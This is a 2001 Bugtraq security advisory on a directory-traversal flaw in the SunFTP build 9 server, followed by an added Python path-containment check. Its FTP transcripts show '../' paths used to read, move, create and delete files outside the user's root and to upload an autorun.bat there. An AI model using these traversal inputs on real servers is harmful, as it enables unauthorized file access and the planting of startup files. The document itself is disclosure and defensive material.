Bugtraq mailing list archives
Sunftp build9(1) - ftp server Vulnerability
From: se00020 () LION CC
Date: Fri, 2 Mar 2001 12:14:23 -0000
It is possible to break out of the root directory by using relative paths.
e:\crap was used as homedir of user test.

#the get command#
getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s

#the mkdir command#
without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

hell! it's getting worse...

#the rmdir command#
without any priv. to remove anything

ftp> rmdir ../test
250 '/../test': directory removed.

this only works with empty directories

#the rename command#
it is possible to rename files outside of the root directory without permissions. And it is also possible to move files with the rename command, when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s

#the put command#
If you have permission to upload files, you can put these files outside of the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 .
drw-rw-rw- 1 ftp ftp 0 Feb 28 13:46 ..
-rw-rw-rw- 1 ftp ftp 0 Mar 02 11:21 grmbl.txt
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok

Solution
no quick bugfix. Use with care

I tried to contact the authors, but their webpage seems to be down.

se00020 () lion cc or se00020 () fhs-hagenberg ac at
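
Added example, not part of the original post and not SunFTP's code: in the session above `cd ..` is refused while get, mkdir, rmdir, rename and put accept `../`, so the sketch below routes every path argument through one containment check before any file operation. The function names, the `SESSION` list and the mapping of client commands to FTP verbs are assumptions made for illustration; the home directory `e:\crap` and the path arguments are the ones from the post.

```python
import ntpath

class PathEscape(Exception):
    """Client-supplied path resolves outside the user's FTP root."""

def resolve_virtual(cwd, arg):
    """Normalize an FTP path argument against the virtual cwd ('/' = home dir)."""
    arg = arg.replace("\\", "/")          # Windows server: both separators count
    if ":" in arg or "\x00" in arg:       # drive letters, alternate streams, NUL bytes
        raise PathEscape(arg)
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                 # would climb above the virtual root
                raise PathEscape(arg)
            parts.pop()
        elif seg != seg.rstrip(". "):     # Windows may strip trailing dots/spaces
            raise PathEscape(arg)
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def to_real(home, cwd, arg):
    """Map a client path to a filesystem path that lies under home, or raise."""
    virt = resolve_virtual(cwd, arg)
    real = ntpath.normpath(ntpath.join(home, *virt.split("/")[1:]))
    root = ntpath.normcase(ntpath.normpath(home))
    candidate = ntpath.normcase(real)
    if candidate != root and not candidate.startswith(root + "\\"):
        raise PathEscape(arg)             # second, independent check on the final path
    return real

# Path arguments from the post's session (get=RETR, mkdir=MKD, rmdir=RMD,
# rename=RNFR, put=STOR); the list itself is constructed for this example.
SESSION = [("RETR", "../sunftptest.txt"), ("MKD", "test"), ("MKD", "../test"),
           ("RMD", "../test"), ("RNFR", "../sunftptest.txt"),
           ("STOR", "test.txt"), ("STOR", "../autorun.bat")]

def audit(home, cwd, session):
    """Return (verb, arg, allowed) per command; every verb shares the same check."""
    out = []
    for verb, arg in session:
        try:
            to_real(home, cwd, arg)
            out.append((verb, arg, True))
        except PathEscape:
            out.append((verb, arg, False))
    return out
```

This check covers only path containment; whether the user may create, delete or upload at all is a separate permission decision made after the path has been accepted.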